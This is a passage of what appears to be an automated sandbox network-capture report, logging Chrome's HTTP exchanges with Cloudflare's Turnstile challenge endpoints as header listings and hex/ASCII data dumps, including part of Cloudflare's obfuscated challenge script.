                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:45 UTC240INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:45 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c8b3d85c42a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.1649724104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:47 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:47 UTC240INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:47 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c969b0a4314-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.1649727104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:48 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 3214
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:48 UTC3214OUTData Raw: 76 5f 38 66 30 36 31 63 37 66 36 61 30 65 34 33 61 61 3d 77 4c 61 45 58 45 62 45 6c 45 54 45 71 45 53 34 70 63 34 70 38 41 45 37 7a 52 55 79 6e 7a 74 4a 24 70 49 47 70 58 51 45 4d 68 70 50 45 79 4c 70 59 70 69 74 47 70 6e 33 64 45 58 47 70 4f 45 6e 57 66 38 70 25 32 62 74 45 70 6e 54 37 70 62 4e 38 70 79 51 4d 4e 55 47 75 45 64 70 78 77 70 62 76 64 68 51 38 7a 44 76 70 37 45 79 76 70 44 6f 56 71 68 70 53 63 67 62 4a 6a 49 45 59 7a 70 56 50 55 61 75 75 47 42 74 51 4d 6d 69 63 64 67 45 4d 66 68 45 6a 4e 2d 61 61 61 44 59 7a 70 36 61 68 68 74 70 78 4e 54 52 69 76 79 45 74 56 61 71 70 70 67 2b 58 59 70 6e 2d 6e 70 67 57 50 79 62 70 7a 70 59 67 57 70 6e 59 4b 70 4d 61 70 78 6c 45 75 53 5a 38 70 6a 6f 78 71 70 54 78 65 4d 49 47 72 61 2d 7a 70 64 6f 50 7a 76 70
                                                                              Data Ascii: v_8f061c7f6a0e43aa=wLaEXEbElETEqES4pc4p8AE7zRUynztJ$pIGpXQEMhpPEyLpYpitGpn3dEXGpOEnWf8p%2btEpnT7pbN8pyQMNUGuEdpxwpbvdhQ8zDvp7EyvpDoVqhpScgbJjIEYzpVPUauuGBtQMmicdgEMfhEjN-aaaDYzp6ahhtpxNTRivyEtVaqppg+XYpn-npgWPybpzpYgWpnYKpMapxlEuSZ8pjoxqpTxeMIGra-zpdoPzvp
                                                                              2024-12-11 14:19:48 UTC779INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:48 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 152360
                                                                              Connection: close
                                                                              cf-chl-gen: y3gVBopEYx6sQUTpaTObmO6V1ICC1uwKM7RV8HlJHwEYAhJR9VnfW4x4bq72sQI74vIxVzpoYC4Yb3d/n6W9bVOT8399eZkZa5O/+ioikFLUCWqo5Sb+SBHMtJEtsaIqm0DQk1UkMIaWCIEVT9wzL16pf/36qAy+NVw14HDgAS50hYUmNWObyPbQQVpRuRWb80B9knl87IpAU8/u8vN+Eyrqxe7TWjSmAaIbQeNit9Yr+v4ZD7u6J0WskiGcH8LfugQ78ljqheMYokwNA5J97BV/nDqF4kC1FI0jUHjC/soHdIC3dfrGAJqGVj0oCipjEcICWTV6QkN+l5S1sVpO8HCJdMKu9cV5cOnNdmPagf5Oraa4x4E7hao3+2JLg/sF/auWWMyYF0OFqvDJsUCbeM3vSlMF/7+AmDQlZ5DAel8/wmq8hwKG4DYjT0I2dKm2TqruRibvdifnZhh2xpWEXzeAXrJLxvvDeM7DmUIAkFoCNHxtPRU1dJkAfXJJ+sl9Vaggf1Cx0Hd2wzvS$Snp18mXdrk37rur7
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c9a1a8643ed-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:48 UTC590INData Raw: 65 6f 68 48 53 59 4e 69 67 4a 4b 4e 65 31 31 50 6b 6d 35 77 64 46 42 6b 66 48 68 6f 65 48 74 67 6e 35 36 6b 6b 48 32 61 5a 48 4b 56 59 6e 6c 6b 66 49 43 48 71 61 78 2f 63 49 4f 51 71 61 65 75 67 6e 61 4e 6c 34 71 73 6d 35 79 41 67 38 57 41 6c 63 6a 4a 69 49 4f 4b 70 35 57 41 70 4d 57 79 7a 63 53 31 6b 4b 76 42 31 4a 6a 57 31 72 75 6c 6c 73 6d 72 72 4e 2b 33 6d 71 50 52 32 4e 6d 39 70 37 2f 74 78 4b 76 44 38 63 71 71 33 2b 58 56 38 75 43 79 74 75 58 72 38 63 2b 38 31 4f 32 35 76 73 4c 77 7a 73 2f 43 30 39 58 62 31 64 51 41 33 68 48 59 42 4f 4c 73 43 39 38 4f 31 4d 6f 59 44 76 63 63 36 52 6f 4f 2f 50 45 61 45 78 4d 68 35 66 4d 6c 33 78 76 34 4b 42 77 51 44 69 41 62 45 53 67 53 43 78 63 57 43 6a 51 7a 4e 43 73 64 44 43 6b 78 4c 6a 4a 46 4e 79 59 59 45 77 68
                                                                              Data Ascii: eohHSYNigJKNe11Pkm5wdFBkfHhoeHtgn56kkH2aZHKVYnlkfICHqax/cIOQqaeugnaNl4qsm5yAg8WAlcjJiIOKp5WApMWyzcS1kKvB1JjW1rullsmrrN+3mqPR2Nm9p7/txKvD8cqq3+XV8uCytuXr8c+81O25vsLwzs/C09Xb1dQA3hHYBOLsC98O1MoYDvcc6RoO/PEaExMh5fMl3xv4KBwQDiAbESgSCxcWCjQzNCsdDCkxLjJFNyYYEwh
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 59 43 4d 53 4e 4a 49 30 68 44 4f 55 55 78 52 41 70 4a 4d 77 34 53 52 31 49 77 4d 56 6c 56 52 31 42 4b 54 7a 45 76 4c 31 77 74 51 6a 5a 6e 51 7a 4e 6a 58 30 35 57 52 6d 52 42 55 43 78 6b 62 45 78 54 64 45 6c 50 53 31 31 61 65 44 78 39 54 46 38 35 63 6c 79 44 52 33 35 30 68 6c 78 36 54 48 68 38 65 6f 5a 50 6b 32 42 70 68 47 31 4b 56 4a 6d 48 62 33 36 65 62 6e 78 39 66 33 46 6a 65 5a 32 58 67 6f 46 69 65 4b 71 6c 67 47 68 70 6d 58 75 4f 63 34 6d 31 67 49 4f 50 74 49 2b 36 70 58 71 30 73 61 4b 71 6c 49 46 2b 6f 61 53 48 79 6f 47 2b 6d 34 65 32 70 71 50 4d 75 70 33 4e 70 35 50 53 31 72 4b 7a 7a 70 4f 39 31 64 6a 4c 76 37 66 62 30 4c 61 76 36 4e 4c 65 32 71 4c 6f 33 4f 6e 43 76 66 44 7a 34 65 6e 56 74 62 48 6a 31 65 6a 74 33 4c 58 56 41 66 71 38 32 72 37 75 34
                                                                              Data Ascii: YCMSNJI0hDOUUxRApJMw4SR1IwMVlVR1BKTzEvL1wtQjZnQzNjX05WRmRBUCxkbExTdElPS11aeDx9TF85clyDR350hlx6THh8eoZPk2BphG1KVJmHb36ebnx9f3FjeZ2XgoFieKqlgGhpmXuOc4m1gIOPtI+6pXq0saKqlIF+oaSHyoG+m4e2pqPMup3Np5PS1rKzzpO91djLv7fb0Lav6NLe2qLo3OnCvfDz4enVtbHj1ejt3LXVAfq82r7u4
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 44 4f 79 55 63 4b 52 70 4e 56 52 51 78 55 53 55 77 49 68 6f 74 50 6b 38 78 4d 79 73 68 56 54 45 2f 50 31 51 66 4e 45 6c 46 51 46 70 43 55 45 67 74 58 58 4d 78 62 6a 38 7a 64 56 68 75 64 30 39 78 61 44 38 39 61 56 64 41 5a 48 56 38 59 47 46 68 69 6c 52 4b 57 33 70 35 63 46 78 6c 61 49 31 6d 55 6f 4f 56 61 49 70 6d 6a 47 36 58 56 31 2b 4d 62 47 47 67 6f 58 65 53 68 35 75 59 72 49 43 72 70 6e 79 68 67 33 32 73 63 59 71 48 73 70 69 57 71 36 78 35 74 72 53 63 64 6f 43 55 6f 33 71 6c 70 70 32 64 6f 70 72 46 78 72 36 75 7a 6f 37 52 6f 6f 79 72 78 4a 61 6c 73 35 47 76 74 38 54 4e 71 39 53 7a 79 61 48 42 76 37 66 65 33 2b 50 68 36 61 75 6f 34 63 58 46 37 4e 4c 65 38 76 4c 32 39 65 2b 71 2b 4d 4c 4f 78 38 72 4e 7a 74 66 76 33 66 6b 46 41 4c 7a 51 32 73 50 79 31 4e
                                                                              Data Ascii: DOyUcKRpNVRQxUSUwIhotPk8xMyshVTE/P1QfNElFQFpCUEgtXXMxbj8zdVhud09xaD89aVdAZHV8YGFhilRKW3p5cFxlaI1mUoOVaIpmjG6XV1+MbGGgoXeSh5uYrICrpnyhg32scYqHspiWq6x5trScdoCUo3qlpp2doprFxr6uzo7RooyrxJals5Gvt8TNq9SzyaHBv7fe3+Ph6auo4cXF7NLe8vL29e+q+MLOx8rNztfv3fkFALzQ2sPy1N
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 56 55 4a 49 45 30 42 51 4c 54 6f 58 4e 6a 73 36 51 56 68 4c 50 53 42 42 4d 6a 73 38 59 57 4e 64 61 46 6f 6d 54 46 6c 74 4c 32 52 47 62 6d 6c 56 61 46 6b 30 52 6b 78 50 4e 32 69 41 4f 6a 78 4d 62 46 4e 61 52 33 6c 61 56 49 6f 2b 5a 47 31 6b 6a 57 53 50 67 6c 35 64 68 49 4b 42 5a 33 69 50 66 58 64 33 6c 6c 31 68 59 6e 56 2f 64 57 56 38 64 59 52 6c 6a 4a 61 4c 71 4a 2b 49 6e 37 47 4d 72 6e 4f 6d 6f 71 79 5a 68 61 53 6c 75 4c 71 49 6c 48 75 41 6d 5a 75 6a 73 63 65 70 70 36 57 72 71 62 37 49 68 61 48 48 6d 71 32 68 6c 4c 66 53 31 4d 58 46 74 37 6a 55 75 72 4f 74 34 70 33 4d 35 4e 43 7a 6e 61 4b 2b 33 74 7a 45 70 4e 6e 6c 30 63 44 54 76 39 48 4e 73 37 2b 75 31 39 6e 5a 32 38 6a 49 37 4c 72 51 30 74 61 39 30 2b 48 41 43 66 62 56 39 4d 62 38 32 75 48 6c 32 2f 45
                                                                              Data Ascii: VUJIE0BQLToXNjs6QVhLPSBBMjs8YWNdaFomTFltL2RGbmlVaFk0RkxPN2iAOjxMbFNaR3laVIo+ZG1kjWSPgl5dhIKBZ3iPfXd3ll1hYnV/dWV8dYRljJaLqJ+In7GMrnOmoqyZhaSluLqIlHuAmZujscepp6Wrqb7IhaHHmq2hlLfS1MXFt7jUurOt4p3M5NCznaK+3tzEpNnl0cDTv9HNs7+u19nZ28jI7LrQ0ta90+HACfbV9Mb82uHl2/E
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 45 6f 76 54 56 78 59 53 7a 6b 71 48 45 78 55 4a 55 56 51 5a 69 41 6f 56 6b 52 68 61 69 4a 50 4c 69 73 6d 54 30 45 7a 53 6b 68 46 4e 30 52 48 65 44 68 51 57 7a 31 30 57 48 70 69 51 6c 74 55 56 6f 73 2b 65 6f 64 4c 59 6d 42 64 54 32 4b 4b 5a 4a 43 50 56 59 2b 4e 5a 48 57 54 58 47 78 70 6c 35 64 30 6a 34 61 64 59 35 2b 71 6e 48 65 61 6f 48 71 6b 72 34 47 4e 68 49 4f 45 67 71 65 76 73 58 65 77 74 33 61 34 6a 70 75 59 6a 33 2b 63 6c 34 2b 51 74 61 47 34 69 4d 6a 47 6a 73 69 76 69 62 53 2b 6a 4d 2f 58 7a 4d 2b 6d 6b 37 75 30 71 35 36 74 6f 4f 4f 37 30 74 69 64 70 73 50 62 71 4f 58 43 35 4d 7a 4a 36 73 4c 75 34 4f 4c 79 72 62 2f 4b 77 73 37 58 2f 4d 37 5a 74 65 72 70 42 4d 4c 4d 2f 67 58 45 30 4c 76 6c 2b 38 58 35 36 66 6a 4e 44 76 49 4f 7a 42 48 67 35 4d 72 68
                                                                              Data Ascii: EovTVxYSzkqHExUJUVQZiAoVkRhaiJPLismT0EzSkhFN0RHeDhQWz10WHpiQltUVos+eodLYmBdT2KKZJCPVY+NZHWTXGxpl5d0j4adY5+qnHeaoHqkr4GNhIOEgqevsXewt3a4jpuYj3+cl4+QtaG4iMjGjsivibS+jM/XzM+mk7u0q56toOO70tidpsPbqOXC5MzJ6sLu4OLyrb/Kws7X/M7ZterpBMLM/gXE0Lvl+8X56fjNDvIOzBHg5Mrh
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 6b 55 57 31 52 46 5a 6a 41 6b 57 32 5a 73 53 53 70 70 63 43 4a 6f 61 46 4e 7a 4d 30 42 34 52 57 68 48 61 54 6c 49 52 6c 42 71 67 55 42 59 68 55 56 33 58 45 43 44 64 31 35 56 64 6f 6c 4b 67 49 35 78 61 6c 32 56 5a 35 56 73 67 31 42 79 6d 5a 65 53 58 56 64 67 6e 33 32 68 65 47 42 6b 65 34 53 4c 6d 47 78 74 69 49 43 73 6f 6d 36 6c 67 35 35 6f 64 48 47 6b 75 37 71 76 72 4c 75 77 69 59 47 38 74 4a 36 39 78 37 69 6f 75 6f 44 46 74 4b 69 67 6c 37 36 49 69 71 6a 4b 7a 71 4c 4a 7a 5a 54 62 74 4d 72 5a 31 73 36 5a 73 35 6e 67 30 5a 79 31 32 36 69 37 78 37 6a 46 37 71 37 41 79 73 7a 73 73 38 75 77 73 63 7a 46 31 73 37 61 76 4c 4f 30 74 39 55 44 39 2b 48 59 38 4f 59 41 78 2f 34 4a 39 50 7a 6f 42 51 2f 6a 45 51 33 63 7a 77 41 52 34 75 6b 4a 47 67 38 4d 46 41 37 56 45
                                                                              Data Ascii: kUW1RFZjAkW2ZsSSppcCJoaFNzM0B4RWhHaTlIRlBqgUBYhUV3XECDd15VdolKgI5xal2VZ5Vsg1BymZeSXVdgn32heGBke4SLmGxtiICsom6lg55odHGku7qvrLuwiYG8tJ69x7iouoDFtKigl76IiqjKzqLJzZTbtMrZ1s6Zs5ng0Zy126i7x7jF7q7Ayszss8uwsczF1s7avLO0t9UD9+HY8OYAx/4J9PzoBQ/jEQ3czwAR4ukJGg8MFA7VE
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 35 49 31 6f 71 53 53 74 48 52 32 52 48 55 48 4a 64 5a 6d 46 74 65 55 6c 6c 62 57 70 4a 62 44 64 78 58 54 52 4c 52 44 64 33 59 6e 56 35 64 46 79 4b 65 58 78 5a 5a 30 35 63 66 34 74 39 59 49 79 54 6b 4a 46 57 6b 47 61 62 62 4a 53 51 6d 36 4e 63 59 47 43 44 65 34 4f 6b 6b 34 43 75 64 70 43 46 6f 6f 71 30 62 71 4f 57 64 37 4f 4a 69 4b 79 78 74 71 61 77 75 71 4b 55 75 4c 6d 39 74 72 7a 43 77 4d 61 33 77 36 32 63 75 73 58 4b 77 73 6a 4e 71 4d 66 58 79 4b 69 36 79 74 6e 53 75 72 6d 31 71 39 58 4d 72 4f 58 68 31 64 57 35 76 4d 62 62 75 74 71 35 33 4b 2f 6f 70 65 62 30 7a 63 33 30 74 75 54 55 38 66 47 38 36 73 76 2b 75 39 67 41 76 4e 50 6b 34 66 4c 7a 77 2f 6b 47 35 66 72 47 45 76 7a 74 34 42 50 4e 38 64 45 61 38 67 76 73 47 76 59 62 43 65 30 63 38 76 48 34 46 43
                                                                              Data Ascii: 5I1oqSStHR2RHUHJdZmFteUllbWpJbDdxXTRLRDd3YnV5dFyKeXxZZ05cf4t9YIyTkJFWkGabbJSQm6NcYGCDe4Okk4CudpCFooq0bqOWd7OJiKyxtqawuqKUuLm9trzCwMa3w62cusXKwsjNqMfXyKi6ytnSurm1q9XMrOXh1dW5vMbbutq53K/opeb0zc30tuTU8fG86sv+u9gAvNPk4fLzw/kG5frGEvzt4BPN8dEa8gvsGvYbCe0c8vH4FC
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 59 79 70 6e 4d 53 31 64 56 6a 52 55 64 6d 51 32 5a 30 56 65 50 6a 6c 63 65 55 31 79 54 48 4e 68 52 56 43 47 66 46 39 57 59 59 64 42 69 6d 31 52 53 6f 6c 6b 62 33 53 58 55 35 47 51 66 48 78 33 67 49 47 57 64 35 47 43 6d 4a 70 69 64 6e 56 63 6d 35 35 72 66 4b 32 6f 68 49 43 6b 6f 34 69 55 74 62 4f 79 6d 4b 32 30 70 6f 68 35 73 6e 35 30 77 62 75 2b 70 4b 2b 2f 78 61 53 70 74 4b 47 34 75 63 4b 48 77 4b 32 65 31 73 6a 47 72 4c 66 43 75 73 6a 54 30 71 66 4e 73 5a 53 72 33 4d 54 6c 6e 64 65 34 36 72 72 68 34 2b 47 75 33 61 7a 4d 75 2b 50 56 74 73 79 34 7a 2b 37 31 30 4e 4c 62 33 50 48 59 39 66 61 37 76 73 2f 47 30 73 6b 4c 43 64 73 4d 36 2f 6a 35 79 63 2f 6e 35 50 30 49 34 41 62 52 30 75 67 49 37 50 63 4e 44 50 41 57 48 41 33 65 4a 79 41 4b 35 43 4d 69 4b 77 63
                                                                              Data Ascii: YypnMS1dVjRUdmQ2Z0VePjlceU1yTHNhRVCGfF9WYYdBim1RSolkb3SXU5GQfHx3gIGWd5GCmJpidnVcm55rfK2ohICko4iUtbOymK20poh5sn50wbu+pK+/xaSptKG4ucKHwK2e1sjGrLfCusjT0qfNsZSr3MTlnde46rrh4+Gu3azMu+PVtsy4z+710NLb3PHY9fa7vs/G0skLCdsM6/j5yc/n5P0I4AbR0ugI7PcNDPAWHA3eJyAK5CMiKwc
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 48 4a 49 54 6d 70 47 63 55 68 6f 62 32 36 41 66 31 5a 33 55 31 4e 6b 56 58 68 59 50 46 6c 35 62 6c 68 62 61 34 4f 4c 68 6b 5a 4f 68 46 39 52 63 47 61 55 68 35 4b 61 6c 35 46 79 66 32 4f 56 64 4a 36 49 6d 6e 71 49 67 70 35 38 6f 6f 75 6a 6b 57 2b 72 70 36 79 54 62 61 71 4a 6a 33 47 34 70 58 31 2f 6b 5a 53 43 77 35 44 47 6f 72 2b 6e 6b 61 4f 43 6e 6f 32 33 71 39 47 37 79 36 57 50 30 4b 53 4a 31 73 65 30 6d 64 79 74 6e 61 37 51 71 62 57 35 75 64 6d 66 77 39 76 66 31 73 48 65 7a 64 37 43 34 64 47 75 7a 63 76 31 7a 4e 54 47 38 4d 72 45 75 2f 44 7a 39 72 65 37 75 39 54 78 76 4e 58 6b 34 50 66 4b 35 41 66 49 43 2f 73 47 43 2b 41 41 38 64 4d 48 7a 78 51 50 43 2f 77 4b 38 41 67 5a 38 50 41 67 49 53 48 77 47 69 49 44 48 52 58 68 42 78 38 75 47 51 77 6c 48 67 6b 51
                                                                              Data Ascii: HJITmpGcUhob26Af1Z3U1NkVXhYPFl5blhba4OLhkZOhF9RcGaUh5Kal5Fyf2OVdJ6ImnqIgp58ooujkW+rp6yTbaqJj3G4pX1/kZSCw5DGor+nkaOCno23q9G7y6WP0KSJ1se0mdytna7QqbW5udmfw9vf1sHezd7C4dGuzcv1zNTG8MrEu/Dz9re7u9TxvNXk4PfK5AfIC/sGC+AA8dMHzxQPC/wK8AgZ8PAgISHwGiIDHRXhBx8uGQwlHgkQ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.1649725104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:48 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f061c7f6a0e43aa&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:48 UTC331INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:48 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 110997
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061c9afb700f6c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:48 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65
                                                                              Data Ascii: s%20no%20longer%20available","turnstile_footer_privacy":"Privacy","turnstile_feedback_report":"Having%20trouble%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expire
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 66 57 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 77 2c 67 78 2c 67 45 2c 66 54 2c 66 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 38 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 32 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 37 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 36 38 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 37 33 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 31 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 38 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                              Data Ascii: fW,gp,gq,gr,gs,gw,gx,gE,fT,fU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1528))/1*(-parseInt(gI(962))/2)+parseInt(gI(1257))/3+parseInt(gI(1568))/4*(-parseInt(gI(373))/5)+parseInt(gI(1441))/6+parseInt(gI(286))/7*(parseInt(gI(
